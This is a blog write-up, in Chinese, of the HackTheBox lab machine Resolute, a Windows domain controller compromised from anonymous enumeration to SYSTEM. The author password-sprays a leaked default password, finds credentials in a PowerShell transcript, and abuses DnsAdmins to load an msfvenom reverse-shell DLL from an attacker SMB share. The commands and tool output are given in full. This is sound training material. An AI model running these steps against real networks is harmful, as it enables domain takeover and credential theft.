Resolute-htb-writeup

0x00 靶场技能介绍

章节技能：RPC服务匿名登录、LDAP发现默认密码信息、密码喷洒攻击、隐藏脚本目录泄露用户密码、DnsAdmins特权组提权

参考链接：https://b0ysie7e.gitbook.io/articulos/write-up/hackthebox/2024-03-28-resolute

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.169

2、获取下开放端口情况：

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=5000  -oG allports 10.10.10.169
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 01:58 CST
Nmap scan report for 10.10.10.169
Host is up (0.12s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49680/tcp open  unknown
49681/tcp open  unknown
49686/tcp open  unknown
49838/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','                                             
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49686,49838,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49686,49838 -sV -sC --min-rate=5000 10.10.10.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 02:00 CST
Nmap scan report for 10.10.10.169
Host is up (1.3s latency).

PORT      STATE  SERVICE      VERSION
53/tcp    open   tcpwrapped
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-29 10:02:08Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49680/tcp open   msrpc        Microsoft Windows RPC
49681/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49686/tcp open   msrpc        Microsoft Windows RPC
49838/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2024-05-29T03:03:10-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -5h38m19s, deviation: 4h02m31s, median: -7h58m19s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-05-29T10:03:08
|_  start_date: 2024-05-29T09:54:44

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.65 seconds

3、绑定下发现的域名情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.169 megabank.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.169 megabank.local

4、经过枚举发现rpc的135端口可以匿名访问，下面获取下用户ID清单

┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U "" -N 10.10.10.169 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v 0x | tr -d "[]" > users

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat users                                                                     
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki

5、同时使用rpcenum这个工具批量获取下信息

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ sudo ./rpcenum -i 10.10.10.169 -e All
[sudo] kali 的密码：

[*] Enumerating Domain Users...

  +                 +
  | Users           |
  +                 +
  | Administrator   |
  | Guest           |
  | krbtgt          |
  | DefaultAccount  |
  | ryan            |
  | marko           |
  | sunita          |
  | abigail         |
  | marcus          |
  | sally           |
  | fred            |
  | angela          |
  | felicia         |
  | gustavo         |
  | ulf             |
  | stevie          |
  | claire          |
  | paulo           |
  | steve           |
  | annette         |
  | annika          |
  | per             |
  | claude          |
  | melanie         |
  | zach            |
  | simon           |
  | naoki           |
  +                 +

[*] Listing domain users with description...

  +                 +                                                           +
  | User            | Description                                               |
  +                 +                                                           +
  | Administrator   | Built-in account for administering the computer/domain    |
  | Guest           | Built-in account for guest access to the computer/domain  |
  | krbtgt          | Key Distribution Center Service Account                   |
  | DefaultAccount  | A user account managed by the system.                     |
  | marko           | Account created. Password set to Welcome123!              |
  +                 +                                                           +

[*] Enumerating Domain Admin Users...

  +                   +
  | DomainAdminUsers  |                                                                                                                                                                 
  +                   +                                                                                                                                                                 
  | Administrator     |                                                                                                                                                                 
  +                   +                                                                                                                                                                 
                                                                                                                                                                                        
[*] Enumerating Domain Groups...

  +                                          +                                                                                                                   +
  | DomainGroup                              | Description                                                                                                       |                      
  +                                          +                                                                                                                   +                      
  | Enterprise Read-only Domain Controllers  | Members of this group are Read-Only Domain Controllers in the enterprise                                          |                      
  | Domain Admins                            | Designated administrators of the domain                                                                           |                      
  | Domain Users                             | All domain users                                                                                                  |                      
  | Domain Guests                            | All domain guests                                                                                                 |                      
  | Domain Computers                         | All workstations and servers joined to the domain                                                                 |                      
  | Domain Controllers                       | All domain controllers in the domain                                                                              |                      
  | Schema Admins                            | Designated administrators of the schema                                                                           |                      
  | Enterprise Admins                        | Designated administrators of the enterprise                                                                       |                      
  | Group Policy Creator Owners              | Members in this group can modify group policy for the domain                                                      |                      
  | Read-only Domain Controllers             | Members of this group are Read-Only Domain Controllers in the domain                                              |                      
  | Cloneable Domain Controllers             | Members of this group that are domain controllers may be cloned.                                                  |                      
  | Protected Users                          | Members of this group are afforded additional protections against authentication security threats. See http       |                      
  | Key Admins                               | Members of this group can perform administrative actions on key objects within the domain.                        |                      
  | Enterprise Key Admins                    | Members of this group can perform administrative actions on key objects within the forest.                        |                      
  | DnsUpdateProxy                           | DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).  |                      
  | Contractors                              | Contractors                                                                                                       |                      
  +                                          +                                                                                                                   +

6、这里发现ldap可以匿名枚举正噶域的信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -H ldap://10.10.10.169 -x -b "DC=megabank,DC=local"  > ldap-anonymous

┌──(kali㉿offsec)-[~/Desktop]
└─$ wc -w ldap-anonymous      
15059 ldap-anonymous

┌──(kali㉿offsec)-[~/Desktop]
└─$ ls -la ldap-anonymous                                                           
-rw-r--r-- 1 kali kali 246569  5月30日 02:20 ldap-anonymous

7、在ldap枚举中，发现某个用户的信息中泄露了一个默认密码信息

1
2
3

Marko

Welcome123!

8、经过枚举该密码，发现该密码是域用户melanie的密码

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.169 -u users -p 'Welcome123!' 
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
.................
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!

9、并且该账号可以登录winrm协议和SMB服务

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!'
SMB         10.10.10.169    5985   RESOLUTE         [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP        10.10.10.169    5985   RESOLUTE         [*] http://10.10.10.169:5985/wsman
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.169 -u melanie -p 'Welcome123!' --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [+] Enumerated shares
SMB         10.10.10.169    445    RESOLUTE         Share           Permissions     Remark
SMB         10.10.10.169    445    RESOLUTE         -----           -----------     ------
SMB         10.10.10.169    445    RESOLUTE         ADMIN$                          Remote Admin
SMB         10.10.10.169    445    RESOLUTE         C$                              Default share
SMB         10.10.10.169    445    RESOLUTE         IPC$                            Remote IPC
SMB         10.10.10.169    445    RESOLUTE         NETLOGON        READ            Logon server share 
SMB         10.10.10.169    445    RESOLUTE         SYSVOL          READ            Logon server share

10、直接登录获取到第一个flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'     
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir


    Directory: C:\Users\melanie\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/29/2024   2:55 AM             34 user.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
3c3f8a9d763a489a202f17da42c2f31d
*Evil-WinRM* PS C:\Users\melanie\Desktop>

0x02 系统权限获取

11、初始枚举中，发现了ryan用户拥有一个不场景的用户组

*Evil-WinRM* PS C:\Users> net user ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/29/2024 4:01:02 AM
Password expires             Never
Password changeable          5/30/2024 4:01:02 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

12、在枚举中，还使用了 sharphound 工具进行枚举，但是当前账号并没有什么特殊的权限

13、最后在某个隐藏的脚本目录中，发现了密码信息

*Evil-WinRM* PS C:\Users\melanie\Documents> cd c:/
*Evil-WinRM* PS C:\> dir -force


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/29/2024   5:10 AM      402653184 pagefile.sys


*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> dir
*Evil-WinRM* PS C:\PSTranscripts> dir -force


    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203


c*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
The term 'ccd' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ ccd 20191203
+ ~~~
    + CategoryInfo          : ObjectNotFound: (ccd:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\PSTranscripts> dir 20191203
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203/
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\PSTranscripts\20191203>

14、使用该账号密码，成功登录到ryan用户下，并且枚举中，发现了一些信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\ryan\Documents> net user ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/29/2024 6:44:01 AM
Password expires             Never
Password changeable          5/30/2024 6:44:01 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\ryan\Documents>

15、这里注意到 DnsAdmins 这个东西，通过 google 找到了利用方式，进行提权。

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#dnsadmins

DnsAdmins 组的成员可以利用其特权在 DNS 服务器上以 SYSTEM 特权加载任意 DLL，通常托管在域控制器上的 DNS 服务器。这种能力提供了重要的利用潜力。

16、直接开始利用

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.45 LPORT=443 -f dll -o dll_revershell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: dll_revershell.dll
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbserver share . -smb2support                                                           
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,54932)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:d3dd91f73ddfe50b5e902fdcb1d01d87:0101000000000000807a5eb5d1b1da010185d5e104dbbb30000000000100100077007a0069006200660045006c0048000300100077007a0069006200660045006c004800020010006600420063006500560048004c006e00040010006600420063006500560048004c006e0007000800807a5eb5d1b1da01060004000200000008003000300000000000000000000000004000008e110edca6139beec69bd02eef668f0cc364f8d5e573f5800d29bab328f81adc0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000
[*] Connecting Share(1:share)
[*] Disconnecting Share(1:share)
[*] Closing down connection (10.10.10.169,54932)
[*] Remaining connections []


┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.14.45\share\dll_revershell.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2884
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents>

17、成功获取到反弹shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443            
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.169] 54933
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

18、获取下最终的flag信息

C:\Windows\system32>cd C:/Users/administrator
cd C:/Users/administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D1AC-5AF6

 Directory of C:\Users\Administrator\Desktop

12/04/2019  06:18 AM    <DIR>          .
12/04/2019  06:18 AM    <DIR>          ..
05/29/2024  05:11 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,480,381,952 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
639e41f33edcd2457e2c3fad66e8db32

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/220

打靶记

#shooting-range

Resolute-htb-writeup

https://sh1yan.top/2024/05/30/Resolute-htb-writeup/

作者

shiyan

发布于

2024年5月30日

许可协议

国外某进攻性安全证书-备忘录-2023.3.11版本上一篇

Falafel-htb-writeup 下一篇